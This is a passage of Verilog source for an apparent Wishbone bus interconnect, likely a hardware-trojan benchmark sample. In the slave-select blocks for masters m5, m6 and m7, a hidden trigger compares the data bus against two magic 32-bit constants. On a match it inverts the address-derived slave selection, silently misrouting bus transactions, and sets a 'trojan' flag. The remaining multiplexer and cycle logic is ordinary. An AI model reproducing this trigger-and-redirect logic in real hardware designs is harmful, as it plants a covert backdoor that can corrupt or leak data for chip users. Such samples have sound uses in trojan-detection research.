    always @ (  m4_slv_sel or  s0_m4_rty_o or  s1_m4_rty_o or  s2_m4_rty_o or  s3_m4_rty_o or  s4_m4_rty_o or  s5_m4_rty_o or  s6_m4_rty_o or  s7_m4_rty_o or  s8_m4_rty_o or  s9_m4_rty_o or  s10_m4_rty_o or  s11_m4_rty_o or  s12_m4_rty_o or  s13_m4_rty_o or  s14_m4_rty_o or  s15_m4_rty_o)
    begin
        case ( m4_slv_sel ) 
        4'd0:
        begin
            m4_wb_rty_o = s0_m4_rty_o;
        end
        4'd1:
        begin
            m4_wb_rty_o = s1_m4_rty_o;
        end
        4'd2:
        begin
            m4_wb_rty_o = s2_m4_rty_o;
        end
        4'd3:
        begin
            m4_wb_rty_o = s3_m4_rty_o;
        end
        4'd4:
        begin
            m4_wb_rty_o = s4_m4_rty_o;
        end
        4'd5:
        begin
            m4_wb_rty_o = s5_m4_rty_o;
        end
        4'd6:
        begin
            m4_wb_rty_o = s6_m4_rty_o;
        end
        4'd7:
        begin
            m4_wb_rty_o = s7_m4_rty_o;
        end
        4'd8:
        begin
            m4_wb_rty_o = s8_m4_rty_o;
        end
        4'd9:
        begin
            m4_wb_rty_o = s9_m4_rty_o;
        end
        4'd10:
        begin
            m4_wb_rty_o = s10_m4_rty_o;
        end
        4'd11:
        begin
            m4_wb_rty_o = s11_m4_rty_o;
        end
        4'd12:
        begin
            m4_wb_rty_o = s12_m4_rty_o;
        end
        4'd13:
        begin
            m4_wb_rty_o = s13_m4_rty_o;
        end
        4'd14:
        begin
            m4_wb_rty_o = s14_m4_rty_o;
        end
        4'd15:
        begin
            m4_wb_rty_o = s15_m4_rty_o;
        end
        endcase
    end
    assign m5_wb_data_i = m5_data_i;
    assign m5_data_o = m5_wb_data_o;
    assign m5_wb_addr_i = m5_addr_i;
    assign m5_wb_sel_i = m5_sel_i;
    assign m5_wb_we_i = m5_we_i;
    assign m5_ack_o = m5_wb_ack_o;
    assign m5_err_o = m5_wb_err_o;
    assign m5_rty_o = m5_wb_rty_o;
    always @ (  m5_addr_i)
    begin
        if ( ( m5_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m5_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m5_slv_sel = ( m5_addr_i[( m5_aw - 1 ):( m5_aw - 4 )] ^ 4'b1111 );
            m5_trojan = 1;
        end
        else
        begin 
            m5_slv_sel = m5_addr_i[( m5_aw - 1 ):( m5_aw - 4 )];
        end
    end
    always @ (  m5_slv_sel or  s0_m5_data_o or  s1_m5_data_o or  s2_m5_data_o or  s3_m5_data_o or  s4_m5_data_o or  s5_m5_data_o or  s6_m5_data_o or  s7_m5_data_o or  s8_m5_data_o or  s9_m5_data_o or  s10_m5_data_o or  s11_m5_data_o or  s12_m5_data_o or  s13_m5_data_o or  s14_m5_data_o or  s15_m5_data_o)
    begin
        case ( m5_slv_sel ) 
        4'd0:
        begin
            m5_wb_data_o = s0_m5_data_o;
        end
        4'd1:
        begin
            m5_wb_data_o = s1_m5_data_o;
        end
        4'd2:
        begin
            m5_wb_data_o = s2_m5_data_o;
        end
        4'd3:
        begin
            m5_wb_data_o = s3_m5_data_o;
        end
        4'd4:
        begin
            m5_wb_data_o = s4_m5_data_o;
        end
        4'd5:
        begin
            m5_wb_data_o = s5_m5_data_o;
        end
        4'd6:
        begin
            m5_wb_data_o = s6_m5_data_o;
        end
        4'd7:
        begin
            m5_wb_data_o = s7_m5_data_o;
        end
        4'd8:
        begin
            m5_wb_data_o = s8_m5_data_o;
        end
        4'd9:
        begin
            m5_wb_data_o = s9_m5_data_o;
        end
        4'd10:
        begin
            m5_wb_data_o = s10_m5_data_o;
        end
        4'd11:
        begin
            m5_wb_data_o = s11_m5_data_o;
        end
        4'd12:
        begin
            m5_wb_data_o = s12_m5_data_o;
        end
        4'd13:
        begin
            m5_wb_data_o = s13_m5_data_o;
        end
        4'd14:
        begin
            m5_wb_data_o = s14_m5_data_o;
        end
        4'd15:
        begin
            m5_wb_data_o = s15_m5_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s0_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s0_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd0 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s1_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s1_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd1 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s2_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s2_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd2 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s3_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s3_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd3 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s4_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s4_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd4 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s5_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s5_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd5 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s6_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s6_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd6 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s7_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s7_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd7 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s8_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s8_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd8 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s9_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s9_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd9 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s10_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s10_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd10 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s11_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s11_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd11 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s12_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s12_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd12 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s13_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s13_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd13 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s14_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s14_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd14 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m5_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m5_s15_cyc_o <= ( ( ( m5_cyc_i &  !( m5_stb_i) ) ) ? ( m5_s15_cyc_o ) : ( ( ( ( m5_slv_sel == 4'd15 ) ) ? ( m5_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m5_slv_sel or  s0_m5_ack_o or  s1_m5_ack_o or  s2_m5_ack_o or  s3_m5_ack_o or  s4_m5_ack_o or  s5_m5_ack_o or  s6_m5_ack_o or  s7_m5_ack_o or  s8_m5_ack_o or  s9_m5_ack_o or  s10_m5_ack_o or  s11_m5_ack_o or  s12_m5_ack_o or  s13_m5_ack_o or  s14_m5_ack_o or  s15_m5_ack_o)
    begin
        case ( m5_slv_sel ) 
        4'd0:
        begin
            m5_wb_ack_o = s0_m5_ack_o;
        end
        4'd1:
        begin
            m5_wb_ack_o = s1_m5_ack_o;
        end
        4'd2:
        begin
            m5_wb_ack_o = s2_m5_ack_o;
        end
        4'd3:
        begin
            m5_wb_ack_o = s3_m5_ack_o;
        end
        4'd4:
        begin
            m5_wb_ack_o = s4_m5_ack_o;
        end
        4'd5:
        begin
            m5_wb_ack_o = s5_m5_ack_o;
        end
        4'd6:
        begin
            m5_wb_ack_o = s6_m5_ack_o;
        end
        4'd7:
        begin
            m5_wb_ack_o = s7_m5_ack_o;
        end
        4'd8:
        begin
            m5_wb_ack_o = s8_m5_ack_o;
        end
        4'd9:
        begin
            m5_wb_ack_o = s9_m5_ack_o;
        end
        4'd10:
        begin
            m5_wb_ack_o = s10_m5_ack_o;
        end
        4'd11:
        begin
            m5_wb_ack_o = s11_m5_ack_o;
        end
        4'd12:
        begin
            m5_wb_ack_o = s12_m5_ack_o;
        end
        4'd13:
        begin
            m5_wb_ack_o = s13_m5_ack_o;
        end
        4'd14:
        begin
            m5_wb_ack_o = s14_m5_ack_o;
        end
        4'd15:
        begin
            m5_wb_ack_o = s15_m5_ack_o;
        end
        endcase
    end
    always @ (  m5_slv_sel or  s0_m5_err_o or  s1_m5_err_o or  s2_m5_err_o or  s3_m5_err_o or  s4_m5_err_o or  s5_m5_err_o or  s6_m5_err_o or  s7_m5_err_o or  s8_m5_err_o or  s9_m5_err_o or  s10_m5_err_o or  s11_m5_err_o or  s12_m5_err_o or  s13_m5_err_o or  s14_m5_err_o or  s15_m5_err_o)
    begin
        case ( m5_slv_sel ) 
        4'd0:
        begin
            m5_wb_err_o = s0_m5_err_o;
        end
        4'd1:
        begin
            m5_wb_err_o = s1_m5_err_o;
        end
        4'd2:
        begin
            m5_wb_err_o = s2_m5_err_o;
        end
        4'd3:
        begin
            m5_wb_err_o = s3_m5_err_o;
        end
        4'd4:
        begin
            m5_wb_err_o = s4_m5_err_o;
        end
        4'd5:
        begin
            m5_wb_err_o = s5_m5_err_o;
        end
        4'd6:
        begin
            m5_wb_err_o = s6_m5_err_o;
        end
        4'd7:
        begin
            m5_wb_err_o = s7_m5_err_o;
        end
        4'd8:
        begin
            m5_wb_err_o = s8_m5_err_o;
        end
        4'd9:
        begin
            m5_wb_err_o = s9_m5_err_o;
        end
        4'd10:
        begin
            m5_wb_err_o = s10_m5_err_o;
        end
        4'd11:
        begin
            m5_wb_err_o = s11_m5_err_o;
        end
        4'd12:
        begin
            m5_wb_err_o = s12_m5_err_o;
        end
        4'd13:
        begin
            m5_wb_err_o = s13_m5_err_o;
        end
        4'd14:
        begin
            m5_wb_err_o = s14_m5_err_o;
        end
        4'd15:
        begin
            m5_wb_err_o = s15_m5_err_o;
        end
        endcase
    end
    always @ (  m5_slv_sel or  s0_m5_rty_o or  s1_m5_rty_o or  s2_m5_rty_o or  s3_m5_rty_o or  s4_m5_rty_o or  s5_m5_rty_o or  s6_m5_rty_o or  s7_m5_rty_o or  s8_m5_rty_o or  s9_m5_rty_o or  s10_m5_rty_o or  s11_m5_rty_o or  s12_m5_rty_o or  s13_m5_rty_o or  s14_m5_rty_o or  s15_m5_rty_o)
    begin
        case ( m5_slv_sel ) 
        4'd0:
        begin
            m5_wb_rty_o = s0_m5_rty_o;
        end
        4'd1:
        begin
            m5_wb_rty_o = s1_m5_rty_o;
        end
        4'd2:
        begin
            m5_wb_rty_o = s2_m5_rty_o;
        end
        4'd3:
        begin
            m5_wb_rty_o = s3_m5_rty_o;
        end
        4'd4:
        begin
            m5_wb_rty_o = s4_m5_rty_o;
        end
        4'd5:
        begin
            m5_wb_rty_o = s5_m5_rty_o;
        end
        4'd6:
        begin
            m5_wb_rty_o = s6_m5_rty_o;
        end
        4'd7:
        begin
            m5_wb_rty_o = s7_m5_rty_o;
        end
        4'd8:
        begin
            m5_wb_rty_o = s8_m5_rty_o;
        end
        4'd9:
        begin
            m5_wb_rty_o = s9_m5_rty_o;
        end
        4'd10:
        begin
            m5_wb_rty_o = s10_m5_rty_o;
        end
        4'd11:
        begin
            m5_wb_rty_o = s11_m5_rty_o;
        end
        4'd12:
        begin
            m5_wb_rty_o = s12_m5_rty_o;
        end
        4'd13:
        begin
            m5_wb_rty_o = s13_m5_rty_o;
        end
        4'd14:
        begin
            m5_wb_rty_o = s14_m5_rty_o;
        end
        4'd15:
        begin
            m5_wb_rty_o = s15_m5_rty_o;
        end
        endcase
    end
    assign m6_wb_data_i = m6_data_i;
    assign m6_data_o = m6_wb_data_o;
    assign m6_wb_addr_i = m6_addr_i;
    assign m6_wb_sel_i = m6_sel_i;
    assign m6_wb_we_i = m6_we_i;
    assign m6_ack_o = m6_wb_ack_o;
    assign m6_err_o = m6_wb_err_o;
    assign m6_rty_o = m6_wb_rty_o;
    always @ (  m6_addr_i)
    begin
        if ( ( m6_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m6_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m6_slv_sel = ( m6_addr_i[( m6_aw - 1 ):( m6_aw - 4 )] ^ 4'b1111 );
            m6_trojan = 1;
        end
        else
        begin 
            m6_slv_sel = m6_addr_i[( m6_aw - 1 ):( m6_aw - 4 )];
        end
    end
    always @ (  m6_slv_sel or  s0_m6_data_o or  s1_m6_data_o or  s2_m6_data_o or  s3_m6_data_o or  s4_m6_data_o or  s5_m6_data_o or  s6_m6_data_o or  s7_m6_data_o or  s8_m6_data_o or  s9_m6_data_o or  s10_m6_data_o or  s11_m6_data_o or  s12_m6_data_o or  s13_m6_data_o or  s14_m6_data_o or  s15_m6_data_o)
    begin
        case ( m6_slv_sel ) 
        4'd0:
        begin
            m6_wb_data_o = s0_m6_data_o;
        end
        4'd1:
        begin
            m6_wb_data_o = s1_m6_data_o;
        end
        4'd2:
        begin
            m6_wb_data_o = s2_m6_data_o;
        end
        4'd3:
        begin
            m6_wb_data_o = s3_m6_data_o;
        end
        4'd4:
        begin
            m6_wb_data_o = s4_m6_data_o;
        end
        4'd5:
        begin
            m6_wb_data_o = s5_m6_data_o;
        end
        4'd6:
        begin
            m6_wb_data_o = s6_m6_data_o;
        end
        4'd7:
        begin
            m6_wb_data_o = s7_m6_data_o;
        end
        4'd8:
        begin
            m6_wb_data_o = s8_m6_data_o;
        end
        4'd9:
        begin
            m6_wb_data_o = s9_m6_data_o;
        end
        4'd10:
        begin
            m6_wb_data_o = s10_m6_data_o;
        end
        4'd11:
        begin
            m6_wb_data_o = s11_m6_data_o;
        end
        4'd12:
        begin
            m6_wb_data_o = s12_m6_data_o;
        end
        4'd13:
        begin
            m6_wb_data_o = s13_m6_data_o;
        end
        4'd14:
        begin
            m6_wb_data_o = s14_m6_data_o;
        end
        4'd15:
        begin
            m6_wb_data_o = s15_m6_data_o;
        end
        endcase
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s0_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s0_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s0_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd0 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s1_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s1_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s1_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd1 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s2_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s2_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s2_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd2 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s3_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s3_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s3_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd3 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s4_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s4_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s4_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd4 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s5_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s5_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s5_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd5 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s6_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s6_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s6_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd6 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s7_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s7_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s7_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd7 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s8_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s8_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s8_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd8 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s9_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s9_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s9_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd9 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s10_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s10_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s10_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd10 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s11_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s11_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s11_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd11 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s12_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s12_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s12_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd12 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s13_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s13_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s13_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd13 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s14_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s14_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s14_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd14 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            m6_s15_cyc_o <= 1'b0;
        end
        else
        begin 
            m6_s15_cyc_o <= ( ( ( m6_cyc_i &  !( m6_stb_i) ) ) ? ( m6_s15_cyc_o ) : ( ( ( ( m6_slv_sel == 4'd15 ) ) ? ( m6_cyc_i ) : ( 1'b0 ) ) ) );
        end
    end
    always @ (  m6_slv_sel or  s0_m6_ack_o or  s1_m6_ack_o or  s2_m6_ack_o or  s3_m6_ack_o or  s4_m6_ack_o or  s5_m6_ack_o or  s6_m6_ack_o or  s7_m6_ack_o or  s8_m6_ack_o or  s9_m6_ack_o or  s10_m6_ack_o or  s11_m6_ack_o or  s12_m6_ack_o or  s13_m6_ack_o or  s14_m6_ack_o or  s15_m6_ack_o)
    begin
        case ( m6_slv_sel ) 
        4'd0:
        begin
            m6_wb_ack_o = s0_m6_ack_o;
        end
        4'd1:
        begin
            m6_wb_ack_o = s1_m6_ack_o;
        end
        4'd2:
        begin
            m6_wb_ack_o = s2_m6_ack_o;
        end
        4'd3:
        begin
            m6_wb_ack_o = s3_m6_ack_o;
        end
        4'd4:
        begin
            m6_wb_ack_o = s4_m6_ack_o;
        end
        4'd5:
        begin
            m6_wb_ack_o = s5_m6_ack_o;
        end
        4'd6:
        begin
            m6_wb_ack_o = s6_m6_ack_o;
        end
        4'd7:
        begin
            m6_wb_ack_o = s7_m6_ack_o;
        end
        4'd8:
        begin
            m6_wb_ack_o = s8_m6_ack_o;
        end
        4'd9:
        begin
            m6_wb_ack_o = s9_m6_ack_o;
        end
        4'd10:
        begin
            m6_wb_ack_o = s10_m6_ack_o;
        end
        4'd11:
        begin
            m6_wb_ack_o = s11_m6_ack_o;
        end
        4'd12:
        begin
            m6_wb_ack_o = s12_m6_ack_o;
        end
        4'd13:
        begin
            m6_wb_ack_o = s13_m6_ack_o;
        end
        4'd14:
        begin
            m6_wb_ack_o = s14_m6_ack_o;
        end
        4'd15:
        begin
            m6_wb_ack_o = s15_m6_ack_o;
        end
        endcase
    end
    always @ (  m6_slv_sel or  s0_m6_err_o or  s1_m6_err_o or  s2_m6_err_o or  s3_m6_err_o or  s4_m6_err_o or  s5_m6_err_o or  s6_m6_err_o or  s7_m6_err_o or  s8_m6_err_o or  s9_m6_err_o or  s10_m6_err_o or  s11_m6_err_o or  s12_m6_err_o or  s13_m6_err_o or  s14_m6_err_o or  s15_m6_err_o)
    begin
        case ( m6_slv_sel ) 
        4'd0:
        begin
            m6_wb_err_o = s0_m6_err_o;
        end
        4'd1:
        begin
            m6_wb_err_o = s1_m6_err_o;
        end
        4'd2:
        begin
            m6_wb_err_o = s2_m6_err_o;
        end
        4'd3:
        begin
            m6_wb_err_o = s3_m6_err_o;
        end
        4'd4:
        begin
            m6_wb_err_o = s4_m6_err_o;
        end
        4'd5:
        begin
            m6_wb_err_o = s5_m6_err_o;
        end
        4'd6:
        begin
            m6_wb_err_o = s6_m6_err_o;
        end
        4'd7:
        begin
            m6_wb_err_o = s7_m6_err_o;
        end
        4'd8:
        begin
            m6_wb_err_o = s8_m6_err_o;
        end
        4'd9:
        begin
            m6_wb_err_o = s9_m6_err_o;
        end
        4'd10:
        begin
            m6_wb_err_o = s10_m6_err_o;
        end
        4'd11:
        begin
            m6_wb_err_o = s11_m6_err_o;
        end
        4'd12:
        begin
            m6_wb_err_o = s12_m6_err_o;
        end
        4'd13:
        begin
            m6_wb_err_o = s13_m6_err_o;
        end
        4'd14:
        begin
            m6_wb_err_o = s14_m6_err_o;
        end
        4'd15:
        begin
            m6_wb_err_o = s15_m6_err_o;
        end
        endcase
    end
    always @ (  m6_slv_sel or  s0_m6_rty_o or  s1_m6_rty_o or  s2_m6_rty_o or  s3_m6_rty_o or  s4_m6_rty_o or  s5_m6_rty_o or  s6_m6_rty_o or  s7_m6_rty_o or  s8_m6_rty_o or  s9_m6_rty_o or  s10_m6_rty_o or  s11_m6_rty_o or  s12_m6_rty_o or  s13_m6_rty_o or  s14_m6_rty_o or  s15_m6_rty_o)
    begin
        case ( m6_slv_sel ) 
        4'd0:
        begin
            m6_wb_rty_o = s0_m6_rty_o;
        end
        4'd1:
        begin
            m6_wb_rty_o = s1_m6_rty_o;
        end
        4'd2:
        begin
            m6_wb_rty_o = s2_m6_rty_o;
        end
        4'd3:
        begin
            m6_wb_rty_o = s3_m6_rty_o;
        end
        4'd4:
        begin
            m6_wb_rty_o = s4_m6_rty_o;
        end
        4'd5:
        begin
            m6_wb_rty_o = s5_m6_rty_o;
        end
        4'd6:
        begin
            m6_wb_rty_o = s6_m6_rty_o;
        end
        4'd7:
        begin
            m6_wb_rty_o = s7_m6_rty_o;
        end
        4'd8:
        begin
            m6_wb_rty_o = s8_m6_rty_o;
        end
        4'd9:
        begin
            m6_wb_rty_o = s9_m6_rty_o;
        end
        4'd10:
        begin
            m6_wb_rty_o = s10_m6_rty_o;
        end
        4'd11:
        begin
            m6_wb_rty_o = s11_m6_rty_o;
        end
        4'd12:
        begin
            m6_wb_rty_o = s12_m6_rty_o;
        end
        4'd13:
        begin
            m6_wb_rty_o = s13_m6_rty_o;
        end
        4'd14:
        begin
            m6_wb_rty_o = s14_m6_rty_o;
        end
        4'd15:
        begin
            m6_wb_rty_o = s15_m6_rty_o;
        end
        endcase
    end
    assign m7_wb_data_i = m7_data_i;
    assign m7_data_o = m7_wb_data_o;
    assign m7_wb_addr_i = m7_addr_i;
    assign m7_wb_sel_i = m7_sel_i;
    assign m7_wb_we_i = m7_we_i;
    assign m7_ack_o = m7_wb_ack_o;
    assign m7_err_o = m7_wb_err_o;
    assign m7_rty_o = m7_wb_rty_o;
    always @ (  m7_addr_i)
    begin
        if ( ( m7_data_i == 32'b00101010111110101011110011100000 ) && ( s0_m7_data_o == 32'b00011110010101010101001010101100 ) ) 
        begin
            m7_slv_sel = ( m7_addr_i[( m7_aw - 1 ):( m7_aw - 4 )] ^ 4'b1111 );
            m7_trojan = 1;
        end
        else
        begin 
